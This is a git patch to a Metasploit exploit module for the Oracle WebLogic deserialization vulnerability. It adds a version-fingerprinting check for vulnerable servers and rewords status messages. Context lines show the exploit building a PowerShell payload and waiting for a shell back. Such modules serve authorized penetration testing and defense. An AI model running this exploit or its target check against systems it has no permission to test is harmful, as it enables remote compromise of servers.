From f92d2263d0427bc82bd17e0a8b7c3a1c2f7a6bbf Mon Sep 17 00:00:00 2001
From: Jacob Robles <jrobles@rapid7.com>
Date: Tue, 28 Aug 2018 08:09:30 -0500
Subject: [PATCH] Add check to weblogic_deserialize module

---
 .../windows/misc/weblogic_deserialize.rb      | 36 +++++++++++++++++--
 1 file changed, 34 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/misc/weblogic_deserialize.rb b/modules/exploits/windows/misc/weblogic_deserialize.rb
index 7d22d3e7b8..b96d3f4071 100644
--- a/modules/exploits/windows/misc/weblogic_deserialize.rb
+++ b/modules/exploits/windows/misc/weblogic_deserialize.rb
@@ -48,6 +48,38 @@ class MetasploitModule < Msf::Exploit::Remote
       'DisclosureDate' => 'Apr 17 2018'))
   end
 
+  def check
+    connect
+    req = "GET /console/login/LoginForm.jsp HTTP/1.1\n"
+    req << "Host: #{peer}\n\n"
+    sock.put(req)
+
+    res = sock.get_once
+    disconnect
+    return CheckCode::Unknown unless res
+
+    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res
+    if version
+      version = Gem::Version.new(version)
+      vprint_status(version.to_s)
+
+      case
+      when version.to_s.start_with?('10.3')
+        return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
+      when version.to_s.start_with?('12.1')
+        return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
+      when version.to_s.start_with?('12.2')
+        return CheckCode::Appears unless version > Gem::Version.new('12.2.1.3')
+      end
+    end
+
+    if res.include?('Oracle WebLogic Server Administration Console')
+      return CheckCode::Detected
+    end
+
+    CheckCode::Unknown
+  end
+
   def gen_resp
     pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
     pwrshl.gsub!("%COMSPEC%", "cmd.exe")
@@ -149,7 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if @met_sent.include?(client.peerhost) then return end
     @met_sent << client.peerhost
 
-    vprint_status("met_sent: #{@met_sent}")
+    vprint_status("Sending payload to client: #{client.peerhost}")
 
     # Response format determined by watching network traffic
     # generated by EDB PoC
@@ -304,7 +336,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     start_service
 
-    vprint_status('Sending payload...')
+    print_status('Sending client object payload...')
     send_payload_objdata
 
     # Need to wait this long to make sure we get a shell back